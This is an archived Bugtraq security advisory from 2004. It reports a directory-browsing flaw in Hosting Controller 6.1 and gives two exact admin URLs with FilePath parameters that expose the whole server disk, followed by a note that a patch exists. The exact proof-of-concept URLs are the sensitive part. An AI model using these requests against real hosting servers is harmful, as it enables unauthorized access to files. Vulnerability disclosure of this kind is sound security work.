Hosting Controller

From: mouse small (e_b_i_at_yahoo.com)
Date: 12/05/04

Next message: Martin Schulze: "[SECURITY] [DSA 605-1] New viewcvs packages fix information leak"

Previous message: Marc Schoenefeld: "Opera 7.54 vulnerabilities again (still unfixed)"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Date: 5 Dec 2004 17:42:04 -0000
To: bugtraq@securityfocus.com

('binary' encoding is not supported, stored as-is)

-= Security Advisory =-

Advisory Information
-------------------------

Software Package : Hosting Controller
Vendor Homepage : http://www.hostingcontroller.com
Platforms : Windows based servers
Vulnerable Versions: All version ( Tested on: v.6.1 Hotfix 1.4 )
Vendor Contacted : 12/5/2004
Release Date: : 12/7/2004

Summary
------------

Hosting Controller is a complete array of Web hosting automation tools for the Windows Server family platform.
Hosting Controller has a security flaw which allows attackers to browse any file and any directory on that server.

Details
---------

Vulnerability - Directories Browsing files on the system.
Foolish vulnerability:

1)This vulnerability is on the admin/mail/Statsbrowse.asp and attackers can view the Harddisk by using this file.
Login with your account
http://www.yoursite.com/admin
Now you see
http://www.yoursite.com/admin/main.asp
Change this url to
http://www.yoursite.com/admin/mail/Statsbrowse.asp?FilePath=c:\&Opt=3&level=1&upflag=0

2)This vulnerability is on the admin/iis/Generalbrowse.asp and attackers can view the Harddisk by using this file.
Login with your account
http://www.yoursite.com/admin
Now you see
http://www.yoursite.com/admin/main.asp
Change this url to <br/>
http://www.yoursite.com/admin/iis/Generalbrowse.asp?FilePath=C:\

Solution
----------

The vender was notified, they have released a patch.
Update Your software

Credits
---------

Discovered on May 6, 2004 by (\/) Mouse
Mouse@Shabgard.org
Additional Research: s7az2mm and bl2k
http://Shabgard.org

References
-------------

http://isun.Shabgard.org/hc.html
http://isun.Shabgard.org/hc.txt

Next message: Martin Schulze: "[SECURITY] [DSA 605-1] New viewcvs packages fix information leak"

Previous message: Marc Schoenefeld: "Opera 7.54 vulnerabilities again (still unfixed)"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Relevant Pages

Hosting Controllers - Multiple Security Vulnerabilities
... Hosting Controller - Multiple security vulnerabilities ... Vulnerability - Directories Browsing ... you can gain control and execute code on that machine. ... vulneralbe to the infamous dot dot slash bug /../ ...
(Bugtraq)
[ARL02-A01] Vulnerability in Hosting Controller
... Software Package: Hosting Controller ... Vendor Contacted: 23/Jan/2002 ... A vulnerability exists in Hosting Controller which could ... If a non-existing username is entered, ...
(Bugtraq)
Hosting Controller Multiple Unauthenticated information disclose
... Software Package: Hosting Controller ... Vulnerability: Multiple Unauthenticated information disclose ... the Windows Server family platform. ...
(Bugtraq)
Hosting Controller Multiple Unauthenticated information disclose
... Software Package: Hosting Controller ... Vulnerability: Multiple Unauthenticated information disclose ... the Windows Server family platform. ...
(Vuln-Dev)